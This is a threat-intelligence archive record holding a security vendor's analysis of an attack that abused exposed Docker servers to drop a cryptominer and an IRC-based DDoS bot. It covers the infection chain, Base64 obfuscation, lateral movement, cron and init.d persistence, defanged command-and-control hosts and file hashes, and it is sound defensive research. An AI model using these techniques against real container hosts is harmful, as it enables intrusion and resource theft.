{
	"id": "0b5d9f12-98f6-4039-9f51-3b266f707e72",
	"created_at": "2026-04-06T00:18:07.229762Z",
	"updated_at": "2026-04-10T03:34:59.814095Z",
	"deleted_at": null,
	"sha1_hash": "9a674b28b8097680f722658c467ce4e4f4d4c1d6",
	"title": "Exposed Docker Server Abused to Drop Cryptominer DDoS Bot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 854645,
	"plain_text": "Exposed Docker Server Abused to Drop Cryptominer DDoS Bot\r\nBy By: Augusto Remillano II Sep 08, 2020 Read time: 4 min (988 words)\r\nPublished: 2020-09-08 · Archived: 2026-04-05 16:13:12 UTC\r\nCloud\r\nMalicious actors continue to target environments running Docker containers. We recently encountered an attack that drops\r\nboth a malicious cryptocurrency miner and a DDoS bot on a Docker container built using Alpine Linux as its base image.\r\nMalicious actors continue to target environments running Docker containers. We recently encountered an attack that drops\r\nboth a malicious cryptocurrency miner and a distributed denial-of-service (DDoS) bot on a Docker container built using\r\nAlpine Linux as its base image. A similar attack was also reported by Trend Micro in May; in that previous attack, threat\r\nactors created a malicious Alpine Linux containernews article to also host a malicious cryptocurrency miner and a DDoS\r\nbot.\r\nInfection chain analysis\r\nIn this recent attack, the infection starts with threat actors connecting to an exposed Docker server and then creating and\r\nrunning a Docker container. On the Docker container, the command shown in Figure 1 is executed.\r\nFigure 1. A code snippet of the command that is executed on the Docker container\r\nThe XMI download file (detected by Trend Micro as Trojan.Linux.MALXMR.USNELH820) is a Bash script, shown in\r\nFigure 2, that moves laterally to other hosts in the same container network using information from /.ssh/known_hosts.\r\nFigure 2. A code snippet of the Bash script used in the attack\r\nThe commands shown in Figure 3 download and execute the XMI Bash script and a Python script named “d.py”\r\n(Trojan.Python.MALXMR.D).\r\nFigure 3. A code snippet of the commands sent to targets\r\nThe XMI shell script extensively uses Base64 encoding to avoid detection. Decoding the encoded string shown in Figure 3\r\nyields the command shown in Figure 4, which downloads and executes d.py.\r\nFigure 4. A code snippet of the decoded command that downloads and executes the component named “d.py”\r\nIt is also worth noting that the shell script contains commented-out code, shown in Figure 5, that seems to be used for\r\npropagating the malware via SSH brute-forcing. It is likely that the actors behind this attack used to target or are also\r\nhttps://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html\r\nPage 1 of 5\n\ntargeting SSH servers.\r\nFigure 5. A code snippet of the commented-out code found in the XMI Bash script\r\nThe attack uses multiple techniques to establish persistence. Aside from setting up cron jobs, as shown in Figure 6, it also\r\ncreates its own service for automatic payload execution.\r\nFigure 6. A code snippet of the attack setting up persistence using cron jobs\r\nThe portion that creates the service is also Base64-encoded. Its decoded form, shown in Figure 7, is placed in the the\r\n/etc/init.d directory.\r\nFigure 7. A code snippet of the decoded form of the script, which is placed in the /etc/init.d directory\r\nWe detect the cryptocurrency-mining payload, whose download script is shown in Figure 8, as\r\nCoinminer.Linux.MALXMR.UWELD. Interestingly, the cryptocurrency wallet used by the threat actors is the same one\r\nused in campaigns that exploited vulnerabilities such as CVE-2019-3396, a Confluence vulnerability, and CVE-2017-\r\n5638news article, an Apache Struts vulnerability. According to a report by Tencent Securityopen on a new tab, the 8220\r\nmining group, a criminal gang based in China, is behind the campaign that exploited CVE-2017-5638.\r\nhttps://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html\r\nPage 2 of 5\n\nFigure 8. A code snippet of the cryptocurrency-mining payload download\r\nTo check whether the payload has been successfully dropped, the malware uses md5sum, a program that calculates and\r\nverifies 128-bit MD5 hashes. This verification method is similar to the one used by the Kinsing malware, which was used by\r\nthe H2Miner cryptocurrency-mining botnet that targeted cloud servers in China.\r\nIn addition, the attack drops another payload in the form of a DDoS bot (Backdoor.Linux.KAITEN.AMV), as shown in\r\nFigure 9.\r\nFigure 9. A code snippet of the dropper script that downloads and executes a DDoS bot\r\nThis DDoS bot, some of whose backdoor commands are shown in Figure 10, is based on IRC (Internet Relay Chat) and\r\nappears to be a variant of Kaitennews article (aka Tsunami). Its command-and-control (C\u0026C) servers are\r\nc4k[.]xpl[.]pwndns[.]pw, 104[.]244[.]75[.]25, and 107[.]189[.]11[.]170.\r\nFigure 10. A code snippet of strings found in the DDoS bot showing some of its backdoor commands\r\nAs previously mentioned, the attack also drops d.py, the Python script that we detect as Trojan.Python.MALXMR.D. We\r\nfound that it performs the same routine as Trojan.Linux.MALXMR.USNELH820, that is, it establishes persistence and\r\ndrops cryptocurrency miner and DDoS bot payloads. A code snippet of d.py is shown in Figure 11.\r\nhttps://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html\r\nPage 3 of 5\n\nFigure 11. A code snippet of the d.py Python script\r\nThe infection chain of the attack is illustrated in Figure 12.\r\nFigure 12. A diagram of the infection chain of the attack\r\nSecurity recommendations\r\nAs Docker containers become increasingly targeted by malicious actors, development teams should adopt a risk-based\r\nsecurity approach to reduce containers’ exposure to threats. They can start by not leaving their Docker daemon ports\r\nexposed online. They should also use only official Docker images to ward off threats such as the ones discussed in this post.\r\nThe following best practices could further mitigate risks to their containers:\r\nDeploy an application firewall to help secure containers and catch threats before they can enter the environment.\r\nMinimize the use of third-party software and use verifiable software to ensure malware is not introduced to the\r\ncontainer environment.\r\nImplement the principle of least privilege. Container images should be signed and authenticated. Network\r\nconnections and access to critical components (such as the daemonopen on a new tab service that helps run\r\nhttps://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html\r\nPage 4 of 5\n\ncontainers) should be restricted.\r\nEmploy automated runtime and image scanning to gain further visibility into a container’s processes. Application\r\ncontrol and integrity monitoring help catch anomalous modifications on servers, files, and system areas.\r\nEnterprises can also rely on the following cloud security solutions to protect their Docker containers:\r\nTrend Micro Hybrid Cloud Securityproducts: Provides automated security and protects physical, virtual, and cloud\r\nworkloads\r\nTrend Micro Cloud One™ – Container Securityproducts: Performs automated container image and registry scanning\r\nTrend Micro Deep Security™ Softwareproducts and Trend Micro Deep Security Smart Check – Container Image\r\nScanningproducts: Scan container images to detect malware and vulnerabilities earlier in the development life cycle\r\nWith additional analysis from Arianne Grace Dela Cruz. \r\nIndicators of compromise (IOCs)\r\nFile\r\nname \r\nSHA-256 Detection name\r\nd.py 29316f604f3c0994e8733ea43da8e0e81a559160f5c502fecbb15a71491faf64 Trojan.Python.MALXMR.D\r\ni686 35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d417f17cfb Coinminer.Linux.MALXMR.UWELD\r\nx32b 9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872 Backdoor.Linux.KAITEN.AMV\r\nx64b 855557e415b485cedb9dc2c6f96d524143108aff2f84497528a8fcddf2dc86a2 Backdoor.Linux.KAITEN.AMV\r\nx86_64 fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3 Coinminer.Linux.MALXMR.UWELD\r\nxmi 51654c52e574fd4ebda83c107bedeb0965d34581d4fc095bbb063ecefef08221 Trojan.Linux.MALXMR.USNELH82\r\nURL\r\n205[.]185[.]113[.]151\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html\r\nhttps://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html"
	],
	"report_names": [
		"exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html"
	],
	"threat_actors": [
		{
			"id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7",
			"created_at": "2023-06-23T02:04:34.839947Z",
			"updated_at": "2026-04-10T02:00:04.99239Z",
			"deleted_at": null,
			"main_name": "8220 Gang",
			"aliases": [
				"8220 Mining Group",
				"Returned Libra",
				"Water Sigbin"
			],
			"source_name": "ETDA:8220 Gang",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7618565f-b8b8-4e33-b25e-3e89fdc444dd",
			"created_at": "2023-01-06T13:46:39.434955Z",
			"updated_at": "2026-04-10T02:00:03.326016Z",
			"deleted_at": null,
			"main_name": "Returned Libra",
			"aliases": [
				"8220 Mining Group"
			],
			"source_name": "MISPGALAXY:Returned Libra",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434687,
	"ts_updated_at": 1775792099,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a674b28b8097680f722658c467ce4e4f4d4c1d6.pdf",
		"text": "https://archive.orkl.eu/9a674b28b8097680f722658c467ce4e4f4d4c1d6.txt",
		"img": "https://archive.orkl.eu/9a674b28b8097680f722658c467ce4e4f4d4c1d6.jpg"
	}
}